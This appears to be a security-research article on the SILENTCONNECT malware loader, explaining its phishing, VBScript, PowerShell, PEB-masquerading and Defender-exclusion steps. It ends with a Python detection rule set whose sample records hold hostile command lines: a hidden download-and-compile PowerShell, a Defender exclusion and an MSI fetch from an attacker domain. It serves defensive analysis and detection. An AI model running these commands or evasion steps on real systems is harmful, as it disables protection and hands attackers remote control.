A new multi-stage malware loader dubbed SILENTCONNECT has been observed silently deploying the ConnectWise ScreenConnect remote monitoring and management (RMM) tool onto Windows systems. This sophisticated threat, active since at least March 2025, leverages VBScript, in-memory PowerShell execution, and Process Environment Block (PEB) masquerading to achieve its objectives, granting attackers significant control over compromised corporate environments.
The infection chain begins with a phishing email, often containing a deceptive link masquerading as a legitimate invitation or proposal. Upon clicking, victims are redirected to a Cloudflare Turnstile CAPTCHA page for human verification. Following successful verification, a VBScript file, such as `E-INVITE.vbs`, is automatically downloaded. Threat actors have been observed using convincing filenames, like `Proposal-03-2026.vbs`, to lower victim suspicion.
SILENTCONNECT: A Stealthy RMM Deployment Through Advanced Evasion Techniques
Elastic Security Labs researchers identified the SILENTCONNECT campaign in early March 2026, noting its “living-off-the-land” approach that generated numerous behavioral alerts. The initial VBScript download triggered a “Suspicious Windows Script Downloaded from the Internet” detection rule, providing investigators with a crucial pivot point. Analysis revealed the VBScript was hosted on Cloudflare’s R2.dev storage, while the subsequent C# payload was fetched from Google Drive, utilizing trusted platforms to evade common network defenses.
SILENTCONNECT’s obfuscation techniques are designed to blend seamlessly with normal Windows activity. The VBScript employs a children’s story as a decoy, embedding malicious instructions within obfuscated `Replace` and `Chr` functions. Once decoded, these functions execute a PowerShell command that utilizes the native `curl.exe` utility to download a C# source file. This file is then compiled and executed entirely in memory using `Add-Type`, a method that bypasses traditional endpoint security tools that typically rely on detecting malicious executables written to disk.
The threat actor’s infrastructure, as analyzed through platforms like VirusTotal, demonstrates a consistent pattern of operation. Phishing emails with subjects like “YOU ARE INVITED,” purportedly from a fake company, link back to specific email addresses like dan@checkfirst[.]net[.]au. A critical operational security (OPSEC) oversight identified by researchers was the reuse of the same URI path, `download_invitee.php`, across multiple compromised websites. This pattern allowed for the mapping of the entire campaign infrastructure through targeted searches.
PEB Masquerading and Defense Evasion Strategies
Upon successful execution, the .NET loader undergoes a period of dormancy, sleeping for approximately 15 seconds before proceeding. It then allocates executable memory via `NtAllocateVirtualMemory` and injects a small shellcode stub into this region. This shellcode’s primary function is to locate the address of the Process Environment Block (PEB), a critical Windows data structure that contains information about loaded modules within a process.
By obtaining the PEB address, SILENTCONNECT performs PEB masquerading. It modifies its own module list entry within the PEB, overwriting the `BaseDllName` and `FullDllName` fields. These fields are altered to display `winhlp32.exe` and `c:\windows\winhlp32.exe`, respectively. This technique aims to disguise the malware loader as a seemingly legitimate Windows Help utility, a common tactic to evade detection by Endpoint Detection and Response (EDR) solutions that often rely on PEB data for process analysis.
Further defense evasion tactics include bypassing User Account Control (UAC) through the CMSTPLUA COM interface. The loader then stores its parameters in reversed order as an additional obfuscation layer. Crucially, SILENTCONNECT proceeds to add an exclusion for `.exe` files within Microsoft Defender, effectively disabling real-time scanning for executable files. This allows for the subsequent download of the ScreenConnect MSI installer from `bumptobabeco[.]top` using `curl.exe`.
The ScreenConnect MSI is then installed via `msiexec.exe` and configured as a Windows service. This service then establishes a communication channel with the attacker’s server, typically over TCP port 8041, providing the attackers with full hands-on-keyboard control over the compromised machine.
Organizations are advised to conduct regular audits for unauthorized remote monitoring and management (RMM) deployments. Monitoring outbound network traffic for connections to unknown ScreenConnect server addresses is also recommended. Security teams should flag PowerShell commands that combine `Add-Type` with remote downloads, investigate VBScript files downloaded from the internet, and remain vigilant for unexpected changes to Microsoft Defender exclusions. Additionally, tracking `NtAllocateVirtualMemory` calls originating from .NET processes may offer an early indicator of this threat.
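The detection guidance above, turned into a small rule set run over constructed Sysmon-style process and network records modelled on the SILENTCONNECT chain. This is an added example, not Elastic Security Labs code; the event schema, the `APPROVED_SCREENCONNECT_SERVERS` allowlist, the `Add-MpPreference` command line and the `PLACEHOLDER` URL components are assumptions, and the sample telemetry is constructed.

```python
import re

# Constructed sample telemetry (Sysmon-style process creation and network
# connection records) modelled on the SILENTCONNECT chain; not real logs.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\E-INVITE.vbs"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "curl.exe -s https://drive.google.com/uc?id=PLACEHOLDER '
                r'-o $env:TEMP\l.cs; Add-Type -Path $env:TEMP\l.cs"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Add-MpPreference -ExclusionExtension .exe"},  # assumed form
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\alice\AppData\Local\Temp\sc.msi https://bumptobabeco.top/PLACEHOLDER.msi"},
    {"type": "network", "image": r"C:\Program Files (x86)\ScreenConnect Client (PLACEHOLDER)\ScreenConnect.ClientService.exe",
     "dest": "203.0.113.10", "dest_port": 8041},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Process"},  # benign control record
]

# Assumed: the organisation's sanctioned ScreenConnect server(s); anything else on 8041 is suspect.
APPROVED_SCREENCONNECT_SERVERS = {"198.51.100.5"}
PS_DOWNLOAD = re.compile(r"curl\.exe|Invoke-WebRequest|DownloadString|DownloadFile|https?://", re.I)


def detect(ev):
    """Return the names of the rules a single event trips (empty list if none)."""
    hits = []
    image = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "")
    if ev["type"] == "process":
        # VBScript launched from a download/temp location (heuristic for internet-sourced scripts)
        if image.endswith(("wscript.exe", "cscript.exe")) and re.search(r'\\(downloads|temp)\\[^"]*\.vbs', cmd, re.I):
            hits.append("vbscript_from_download_location")
        # In-memory compile (Add-Type) combined with a remote fetch in the same command line
        if image.endswith("powershell.exe") and "add-type" in cmd.lower() and PS_DOWNLOAD.search(cmd):
            hits.append("powershell_addtype_with_remote_download")
        # Any change to Defender exclusions, regardless of which process issues it
        if re.search(r"(Add|Set)-MpPreference\b.*-Exclusion", cmd, re.I):
            hits.append("defender_exclusion_modified")
        # Native curl.exe pulling an MSI installer over HTTP(S)
        if image.endswith("curl.exe") and re.search(r"https?://\S+\.msi\b", cmd, re.I):
            hits.append("curl_fetching_msi_installer")
    elif ev["type"] == "network":
        # ScreenConnect relay port to a server that is not on the allowlist
        if ev.get("dest_port") == 8041 and ev.get("dest") not in APPROVED_SCREENCONNECT_SERVERS:
            hits.append("screenconnect_port_to_unapproved_server")
    return hits


def scan(events):
    """Map event index -> rule hits for every event that tripped at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := detect(ev))}
```

Running `scan(SAMPLE_EVENTS)` flags the first five records and leaves the benign `Get-Process` record untouched; in production the allowlist and path heuristics would be tuned to the environment's known RMM footprint.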